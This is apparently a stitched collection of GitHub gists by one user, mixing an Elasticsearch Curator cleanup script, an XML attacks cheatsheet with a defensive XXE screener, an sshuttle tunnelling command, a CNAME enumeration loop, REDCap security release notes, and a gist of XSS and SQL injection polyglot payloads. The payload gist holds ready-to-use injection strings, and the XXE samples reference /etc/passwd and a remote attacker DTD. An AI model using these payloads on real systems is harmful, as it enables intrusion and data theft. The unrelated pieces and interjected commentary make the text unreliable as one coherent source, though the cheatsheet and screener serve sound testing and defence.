actions:
  1:
    action: delete_indices
    description: >-
      Delete indices older than X days (based on index name), for winlogbeat-
      prefixed indices. Ignore the error if the filter does not result in an
      actionable list of indices (ignore_empty_list) and exit cleanly.
    options:
      ignore_empty_list: True
      disable_action: False
#!/bin/bash
# This bash script deletes the oldest logs and moves on to more recent logs until it reaches the desired free space on disk.
# Running curator in this fashion is only recommended for single-node clusters or standalone setups such as the HELK.
# This df command grabs the used-space percentage of the root '/'; if you store your logs elsewhere you will have to modify this.
disk=$(df -H / | awk 'NR == 2 { print $5 }' | sed 's/%//')
# If you have more than 90 days of logs, this number will have to be increased. 90 days was chosen on the assumption that you will reach
# your disk space limit before 90 days.
days=90
# Disk threshold at 80 percent; the loop also will not delete logs from the last 2 days.
# Inside [ ], a bare '>' is a shell redirection (it would create a file named "80"), not a numeric comparison, so use -gt and -ne.
while [ "$disk" -gt 80 ] && [ "$days" -ne 2 ]
# (the remainder of the script is not shown in this preview)
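To make the loop's logic concrete, here is an added simulation in Python. It is not the gist's own code and not Curator itself: it reads the age of each daily index from its name, as the Curator filter above does, and walks the day cutoff down from 90 toward the two-day floor until simulated disk usage drops to the threshold. The index names, sizes, disk capacity and the fixed "today" are constructed sample data.

```python
from datetime import date

# Constructed sample data: a fixed "today" and daily indices with made-up sizes (GB).
# Only the winlogbeat- prefix is in scope, matching the curator action file.
TODAY = date(2018, 1, 31)
SAMPLE_INDICES = {
    "winlogbeat-2017.11.01": 5,    # 91 days old
    "winlogbeat-2017.12.01": 25,   # 61 days old
    "winlogbeat-2018.01.01": 25,   # 30 days old
    "winlogbeat-2018.01.28": 15,   # 3 days old
    "winlogbeat-2018.01.30": 15,   # 1 day old
    "sysmon-2017.11.01": 10,       # wrong prefix: never touched
}


def index_age_days(name, today=TODAY):
    """Age of a daily index taken from its name (Curator's 'based on index name' filter)."""
    y, m, d = name.rsplit("-", 1)[1].split(".")
    return (today - date(int(y), int(m), int(d))).days


def plan_deletions(indices, disk_gb, threshold_pct=80, start_days=90, keep_days=2,
                   prefix="winlogbeat-"):
    """Mirror the gist's loop: while usage is above the threshold and the cutoff is
    above keep_days, delete every matching index older than `days`, then pull the
    cutoff one day closer to today. Returns (deleted names in order, final usage %)."""
    remaining = dict(indices)
    deleted = []
    days = start_days

    def used_pct():
        return 100.0 * sum(remaining.values()) / disk_gb

    # 'days > keep_days' is the safer spelling of the gist's '"$days" != 2'.
    while used_pct() > threshold_pct and days > keep_days:
        for name in sorted(remaining):
            if name.startswith(prefix) and index_age_days(name) > days:
                deleted.append(name)
                del remaining[name]
        days -= 1
    return deleted, round(used_pct(), 1)


if __name__ == "__main__":
    for disk in (100, 40):
        gone, pct = plan_deletions(SAMPLE_INDICES, disk_gb=disk)
        print(f"{disk} GB disk: delete {gone}, usage now {pct}%")
```

With a 100 GB disk the simulation stops after removing the two oldest indices; with a 40 GB disk it reaches the two-day floor with usage still at 100%, which is the case where the script exits without reaching its target and a human has to intervene.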
jordanpotti / xml-attacks.md
Created December 7, 2017 13:11 — forked from mgeeky/xml-attacks.md
XML Vulnerabilities and Attacks cheatsheet

XML Vulnerabilities

XML processing modules may not be secure against maliciously constructed data. An attacker can abuse XML features to carry out denial-of-service attacks, read local files, open network connections to other machines, or circumvent firewalls by making the parser issue the requests.

The penetration tester running XML tests against an application first has to determine which XML parser is in use, and then which of the attacks listed below that parser is vulnerable to.
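The attacks above all start with a DTD declaration, so a parser-independent pre-screen can catch them before any entity is expanded or fetched. The following is an added example, not part of the cheatsheet: it uses Python's stdlib expat bindings to abort at the first entity declaration (the same handler-based approach defusedxml takes) and classifies the document. The sample payloads, file path and URL are constructed placeholders.

```python
import xml.parsers.expat as expat


class UnsafeXML(Exception):
    """Raised from inside an expat handler to abort parsing before any entity is expanded."""


def classify_xml(data):
    """Pre-screen untrusted XML and return one of:
    'clean', 'doctype', 'internal-entity', 'external-entity', 'external-dtd', 'malformed'.
    The check stops at the first <!ENTITY> declaration, so an entity-expansion (billion
    laughs) payload is never expanded and a SYSTEM/PUBLIC entity is never fetched."""
    seen_doctype = False
    parser = expat.ParserCreate()
    # Do not read parameter entities or an external DTD while screening.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        nonlocal seen_doctype
        seen_doctype = True
        if sysid or pubid:  # <!DOCTYPE x SYSTEM "http://..."> would pull a remote DTD
            raise UnsafeXML("external-dtd")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        # A SYSTEM/PUBLIC identifier means the parser would open a file or URL (XXE);
        # a plain value is an internal entity, the building block of expansion attacks.
        raise UnsafeXML("external-entity" if (sysid or pubid) else "internal-entity")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(data, True)
    except UnsafeXML as finding:
        return str(finding)
    except expat.ExpatError:
        return "malformed"
    return "doctype" if seen_doctype else "clean"


# Constructed samples of the attack classes named above (path and URL are placeholders).
BENIGN = b"<order><item>1</item></order>"
XXE = (b'<?xml version="1.0"?><!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
       b"<r>&xxe;</r>")
LAUGHS = (b'<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol">'
          b'<!ENTITY lol1 "&lol;&lol;&lol;&lol;">]><lolz>&lol1;</lolz>')
REMOTE_DTD = b'<!DOCTYPE r SYSTEM "http://attacker.invalid/evil.dtd"><r/>'

if __name__ == "__main__":
    samples = [("benign", BENIGN), ("xxe", XXE), ("laughs", LAUGHS), ("remote dtd", REMOTE_DTD)]
    for label, doc in samples:
        print(f"{label}: {classify_xml(doc)}")
```

A screen like this only decides whether to hand the document on; the parser that then processes it still has to be configured safely (for lxml, `resolve_entities=False` and `no_network=True` on `XMLParser`; or use defusedxml, which wires these same expat handlers for you).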


jordanpotti / sshuttle.sh
Created December 4, 2017 18:23 — forked from Davor111/sshuttle.sh
How to use sshuttle with .key, .csr or .pem files for authentication
# It's not directly mentioned in the documentation how to do this, so here you go. This command will tunnel everything, including DNS:
sshuttle --dns -vr user@yourserver.com 0/0 --ssh-cmd 'ssh -i /your/key/path.pem'
jordanpotti / XSS-SQLi-Polygots
Last active November 29, 2019 07:26
Collection of XSS and SQLi Payloads
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample
while read i; do dig CNAME "$i" @8.8.8.8; done < ./<HOST LIST> > cname_domainname
cat cname_domainname|grep "IN CNAME"
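The two commands above collect every CNAME answer into one file and then grep the `IN CNAME` lines out of it. As an added example (not part of the gist), here is a Python reader for that file that pulls out the name/target pairs and groups the ones pointing outside your own zones by provider, which is the usual next step when reviewing such a list. The dig output and hostnames are constructed, and the set of in-scope zones is an assumption you would replace with your own.

```python
import re
from collections import defaultdict

# Constructed stand-in for the cname_domainname file the loop above writes (made-up hosts;
# the answer lines follow dig's "name  TTL  IN  CNAME  target" layout).
SAMPLE_DIG_OUTPUT = """\
; <<>> DiG 9.10.6 <<>> CNAME blog.example.com @8.8.8.8
;; ANSWER SECTION:
blog.example.com.\t300\tIN\tCNAME\texample.github.io.
; <<>> DiG 9.10.6 <<>> CNAME shop.example.com @8.8.8.8
;; ANSWER SECTION:
shop.example.com.\t300\tIN\tCNAME\tshops.myshopify.com.
; <<>> DiG 9.10.6 <<>> CNAME www.example.com @8.8.8.8
;; ANSWER SECTION:
www.example.com.\t300\tIN\tCNAME\tedge.example.com.
; <<>> DiG 9.10.6 <<>> CNAME mail.example.com @8.8.8.8
;; ANSWER SECTION:
mail.example.com.\t300\tIN\tA\t192.0.2.10
"""

# Matches exactly the lines the 'grep "IN CNAME"' step keeps.
CNAME_LINE = re.compile(r"^(\S+)\s+\d+\s+IN\s+CNAME\s+(\S+)\s*$", re.MULTILINE)


def parse_cnames(text):
    """Return (name, target) pairs for every 'IN CNAME' answer line, without trailing dots."""
    return [(n.rstrip("."), t.rstrip(".")) for n, t in CNAME_LINE.findall(text)]


def group_external_targets(pairs, own_zones):
    """Group hostnames whose CNAME target lies outside `own_zones` by the target's last two
    labels. own_zones is the assumed in-scope set; the two-label grouping is a crude stand-in
    for a Public Suffix List lookup and only serves to show which providers are in play."""
    grouped = defaultdict(list)
    for name, target in pairs:
        if any(target == z or target.endswith("." + z) for z in own_zones):
            continue
        grouped[".".join(target.split(".")[-2:])].append(name)
    return dict(grouped)


if __name__ == "__main__":
    found = parse_cnames(SAMPLE_DIG_OUTPUT)
    for provider, hosts in group_external_targets(found, {"example.com"}).items():
        print(f"{provider}: {', '.join(hosts)}")
```

Records whose target stays inside your own zones (www above) are dropped from the grouped view; the rest are the ones worth checking by hand, since whether a dangling third-party target is a problem depends on the provider and is not something the DNS answer alone tells you.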
jordanpotti / REDCap_Change_log
Last active July 18, 2017 13:03
RedCap Release Notes | CVE Reqm
ChangeLog: Standard Release
Version 7.5.1 - (released 7/12/2017)
BUG FIXES & OTHER CHANGES:
Medium security fix: A cross-site scripting vulnerability was found that could be exploited by a malicious user by manipulating the query string of an HTTP request or REDCap link.
Medium security fix: A cross-site scripting vulnerability was found that could be exploited by a malicious user by manipulating text strings input into conversation titles or messages in REDCap Messenger.
Major bug fix: On certain occasions, the cron job that schedules Automated Survey Invitations containing conditional logic using datediff() with "today" as a parameter might mistakenly remove survey invitations that have been scheduled for another project. This would result in random survey participants not receiving their invitations. This issue occurs very seldom.
Minor security fix: A couple functions (e.g., deleting files in the File Repository or on File Upload fields) were mistakenly not being protected from Cross-site Request Forger